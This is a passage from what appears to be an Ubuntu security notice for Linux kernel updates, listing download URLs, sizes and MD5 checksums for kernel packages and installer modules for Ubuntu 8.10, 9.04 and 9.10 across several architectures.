http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-server_2.6.27-17.45_i386.deb
  Size/MD5:   645340 a4d347f729beffbf9ff1701d21a5f9b2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-generic_2.6.27-17.45_i386.deb
  Size/MD5: 23499764 59f3275c547e9f13f97eba55955725f4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-server_2.6.27-17.45_i386.deb
  Size/MD5: 23635906 c096ba5db0db8b87f67309a9e9c6ff5f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-virtual_2.6.27-17.45_i386.deb
  Size/MD5: 10117090 7e1648c7b3a3ab2606263ecb20683ba1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-17.45_i386.deb
  Size/MD5:   675850 3e91710602fec2d4aebafe62a6cdfe80
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   433078 d1439530f50069f41b4c30b010871b4f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   171298 68b786d8853574467c792efe3fa62ca5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   264104 3a49c641e4a146fdb634b298c51ca6e9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:  1994518 105c6b0fb8b650949da502f3fee2018d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   150964 dc4178cced6d9c1823d24b2204c15ae9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   184058 a25940b16b7022a52f7b8c78e164a908
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   157856 c628cef1c909819dab1fe2d812dffeba
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    34500 2ea55d8e77aa3065af30ff4d440c059d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    78286 6d0f7704cdff848dbbfbd5fe60cf0ca7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    86190 c7d8ec25c3d35ea8455e9cf7c1b4ec64
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    51332 79b56b5e7f79a17d45fb7c55f64954b3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:     8796 e571105caa3bed5fc3576928b03eff31
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    64316 bcb0f12340567e9db7a5dcc3549dcf0e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   102092 a2556a5171c52abe48ba423b008c6f13
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:  1450234 339572f5e579468fc438b1dd2cc2dcd3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    44520 68267a8c684d01c673d4b41bf5d4af69
http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    12642 80e228567fcb814cd67e54aec6abdb41
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   373158 483599df2e1b6c82a688b413b74e5b91
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:   189720 156d822da222b7fc8b887a4d1b3b7c31
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb
  Size/MD5:    12992 7232aad22eb02ec694fa0d41d367a69c

Updated packages for Ubuntu 9.04:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-18.59.diff.gz
  Size/MD5:  7350773 c09bf21927b9609694b39cdd55af21cf
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-18.59.dsc
  Size/MD5:     3198 5ba9f01bd70b951901d1d1667b964b54
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28.orig.tar.gz
  Size/MD5: 66766084 062c29b626a55f09a65532538a6184d4

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.28_2.6.28-18.59_all.deb
  Size/MD5:  3636694 05fda32db7067b32c0fe593e1acf0533
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18_2.6.28-18.59_all.deb
  Size/MD5:  8701396 65f8df38ba832ad50c6486d22420efca
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.28_2.6.28-18.59_all.deb
  Size/MD5: 56998214 3d33148ef29824c1060e1f66b470c6c4

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   234600 929bceffa24f85104c08edf073ac1f0e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    44110 6d94c9d8ecfe3b4673d25cce1db2b95b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    43316 d895b0ad91a70c9381fd7e17650fab75
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    51116 da4c61dc01f5b5e8fb61cdf14bbbb40a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    90082 dad217572b5b07064b9e12b0062d16b4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    38016 5e886058b306b4937f5a4ebe22451db6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   521628 d9f3ffe45b307847935002619ac31ea0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   125818 6fbc3c76a739b91e01da41bd535f3791
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    58060 cc30f23edae38f46b0d56f621969fd62
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   312502 9a11c9f0f37fee6a92c59de9df5fca11
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:  3872142 cdc4640244b192a5970dfc3d3efe4d7e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-generic_2.6.28-18.59_amd64.deb
  Size/MD5:   689228 bf7aedb2bbb365a73ed77a8976a2701e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-server_2.6.28-18.59_amd64.deb
  Size/MD5:   689122 80cfc63043a2d7231f86ef3e68f0a131
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-generic_2.6.28-18.59_amd64.deb
  Size/MD5: 24344078 dca923a8044df0ba9c642d5f2b317867
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-server_2.6.28-18.59_amd64.deb
  Size/MD5: 24335914 ad5a4fe70b4555e9399f9a45b58459f9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-virtual_2.6.28-18.59_amd64.deb
  Size/MD5: 10551276 b61ed90bb3d3f19f0d2e593c0e9f091a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-18.59_amd64.deb
  Size/MD5:   766282 f86ee0c95591ea10b578e848b6fdeb5f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   215170 7939440a8813110d952d86b49113e146
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   189496 f7495840a58b11f4ebfaad4d8cf203fe
http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    29412 54845dbae313e98befcc172b5e87ac2c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   274480 e029f99b6550bd014f26c45997f76dcc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:  1933908 6fa450fb440effd7f4a1d643f5e80ab9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   163464 208a84b0506fcd9cadb25f1b7f9d26b7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   194828 596399bbfa9a92e3116c8f8d3a7d1391
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   152994 3cf4fb6614c5798cdcca7c8d7fd04a5b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    36486 b3cf4deb0dc4e11f095eb9bcf81546df
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:     5842 085134ad282a8b2580aa12a6ed64fd9e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    72152 5b6bf270db5279c7d79cbd5fca8e14f6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    22714 a01ded50b855c5ed0580072a2277b74a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:     8874 f173072403f51e6e6da399debd91068f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    47442 e822623d7e4ae0bec0ea5094fed67dcf
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    15656 2b2e6ad08af592fa3106adb4eb16324e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:  1273594 d873a895c58da3fcd5b8a0ea91f9a5ee
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    47204 c80f48bd49fddaae0188cf56350445f8
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    72706 dcc76877eef3af00d0280f96cafb6e45
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   126958 b184498c9d2a598d57e293bc09049cda
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    13472 1399e0100a81d92448659b83949a62a6

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   215860 fe00a3406a5496e200d5c4e5975469f0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    46662 d7a61d1e363f9766795132d3325f02c4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    41352 7d84e783cf7fc4111eaf964395440369
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    47402 2cd024da2955f7e35fe4519c8df5add5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    86924 515a3a07357e06f49b2e4384e2af7b8c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    33578 452adbbc84f5a5218610ddad25eb3ea0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   525752 1a2c59458472f4a18538df9386396703
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   125654 8678d7c3409daf24a373b4d11a0d9263
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    54874 94d4465b06d14b20af5803f2afddf53d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   301338 64a58b9a7ee5d53c2d1a486fe32deb93
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:  3746292 099947b9ddfb625da14b96bf1b9f59e6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-generic_2.6.28-18.59_i386.deb
  Size/MD5:   673824 c36739d12d66db8de4b6e270b1c91464
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-server_2.6.28-18.59_i386.deb
  Size/MD5:   676398 c7091523d59d0b1cdd4453e12d5983d5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-generic_2.6.28-18.59_i386.deb
  Size/MD5: 24662186 cfa5f52488fb3767debfefaf8940f6b5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-server_2.6.28-18.59_i386.deb
  Size/MD5: 24777004 b524e2b45df5e9d30ebc81717b5c62d7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-virtual_2.6.28-18.59_i386.deb
  Size/MD5: 10250016 09b9af49da34304c1dd280896ce9c0cd
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-18.59_i386.deb
  Size/MD5:   766288 4858bc3941dc0e545195c0b911142a4c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   218106 f4f03360ad8e2ee23a58b534e8a2c045
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   174922 fbc6643612c01e91066a87b6ec9c7125
http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    30064 c8e4db00aa9c0c3b75c47c103d87b4c5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   262814 794c683379e359de14db8806fe984f78
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:  2110070 da3e69dab278584e1abea5ee15d9b47d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   150230 7fc91b8ad535bfb705ba2cb2fc9ff57d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   184326 e505e555ac3bd0c33d00a47f7530f78c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   143584 209207f7e7887594a9d55d17bf1dca76
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    34576 cafc0f5f2db11f69d10e75815d3e9018
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:     5504 21cfbb5c1aa4c8d82bf3e1412646263f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    86018 0dc7720bee90887f4ebf5c71cf93d611
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    47636 fbebe71b83526192c08fd6d797ee8cb1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:     8714 14ed52e8c0a75151dd45acf3cb1ffc34
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    44692 27502a17d5ca35cc31a9fd79ae7d2f1d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    14780 2c9ea91e8d8da2bff76c38a6cdce748d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:  1445966 33fa2ee03c566924552fc5b413e2ccf1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    44098 f740dcb377a692e2ff25a65424431e5b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    69290 a7e3130530005bf8fe4edabe8b003888
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   119528 a12c1a5bf9a112402d80e8f77ee87a1c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    12678 6646096dee2575f3bb33510e70bdd52b

lpia architecture (Low Power Intel Architecture):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   215260 9a096eefa7f5e423c60fea41c314b9a5
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    46664 ba3b534d98d6717395ec66b402b3c701
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    40958 5950f34ca1fbd16f82a42020bc934ec6
http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    47312 0d7d48294720bbd387710d560756ce6a
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    86530 9e5c38cd42496250d5fcf951c6b5d4bd
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    33272 a8890faa31cf92122bcce2991374fe7e
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   523810 7b2a58ca4d024926c0f8101ab49242d6
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   125252 f48299cd45e2ef1a74017d1c7653976e
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    63568 135fe854fe31d2d8bd9cd09f40a266e5
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   300756 77668125ff976eaed45f3d2676a46c5f
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:  3035296 186cc64995c4fd4404241de5399eb0fb
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.28-18-lpia_2.6.28-18.59_lpia.deb
  Size/MD5:   641460 1a4d29b73378acb8bcf88658f88dd08e
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.28-18-lpia_2.6.28-18.59_lpia.deb
  Size/MD5: 21796372 d7455e818bf972ef7eb0fe54b7bd96dc
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.28-18.59_lpia.deb
  Size/MD5:   766260 b67d9c1432185123449ed6826ed9588d
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   303982 80fe6dcf6d68a46047ef6ddc2c098614
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   157406 2cc8f76d83482452bb6073656a80b2ee
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    24442 28180da41edae2700e4c8a0e4f1c656f
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   260414 49a0b6bd418a0ff1d274ce8f602e2733
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:  2027576 241ee9a564502f3d8837806d5e6480d0
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   149398 b14f79b842c979418dec65e273836cd0
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   184736 a159624d12831598d35c3b00ba563182
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   143238 2720ae4f8cdad85066fc888e7fc3c796
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    34462 582363a3843fdbded2476793775ace76
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:     5496 67c7245d730a7b241eb9947afeef7669
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    85646 6a31ffe0054c27df1506ae34162ab79e
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    47402 ff41a000c4a3abbed18330e905a01b7b
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:     8718 15aa2d8fafced6b6e3b5a24c698b4089
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    63106 7a967940a04c1ee6a9626258e608b54c
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    14720 dc899d8630769d6270526c49f99a2af8
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:  1447832 400eeba1e83569d777954b21b6df593c
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    43898 16b0a1310e3f70dccfc8d0d5f971b064
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   155186 b22b41e37f88fe49531f5580e0f7f712
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   172666 df244ff125096be469b1c56a30f1e05f
http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:     8154 f2d765541e008431b4d3eae00f435b61

Updated packages for Ubuntu 9.10:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-304.10.dsc
  Size/MD5:     2450 610bb83247876f8a8b47a0fd0d46fae8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-304.10.tar.gz
  Size/MD5: 87052080 62b9dcb9ad24e659db1aa085f9e5a456
http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-108.21.dsc
  Size/MD5:     1906 a39c7ff46fb3ff74480d0e98366a486d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-108.21.tar.gz
  Size/MD5: 81902928 c9e88b4f386710c3f22979986a7e3a34
http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-211.22.dsc
  Size/MD5:     1943 25176b20de251c2e58bb95e2dd9c1c7b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-211.22.tar.gz
  Size/MD5: 82470873 4d5238d3d11105852133d3eb802a95cc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-19.56.diff.gz
  Size/MD5:  2811600 b2b44f12a786758d470e6a29c09d0388
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-19.56.dsc
  Size/MD5:     3782 ae6bf5844769d00004b919a6f61d588c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31.orig.tar.gz
  Size/MD5: 78278595 16c0355d3612806ef87addf7c9f8c9f9

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-doc_2.6.31-304.10_all.deb
  Size/MD5:  3790328 e35ab5c36ee1bac625d2a57bd19e0c5c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-source-2.6.31_2.6.31-304.10_all.deb
  Size/MD5: 64258256 70b947cc9e9012c9472f2c317f11ffae
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-304_2.6.31-304.10_all.deb
  Size/MD5:  9662096 ac58cebef695901ea01bc7413b79109f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc_2.6.31-19.56_all.deb
  Size/MD5:  3791668 3836f273873fedf9d2293ee0d11df6ce
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19_2.6.31-19.56_all.deb
  Size/MD5:  9531414 34d882276f33b0e37135c379a6e1c451
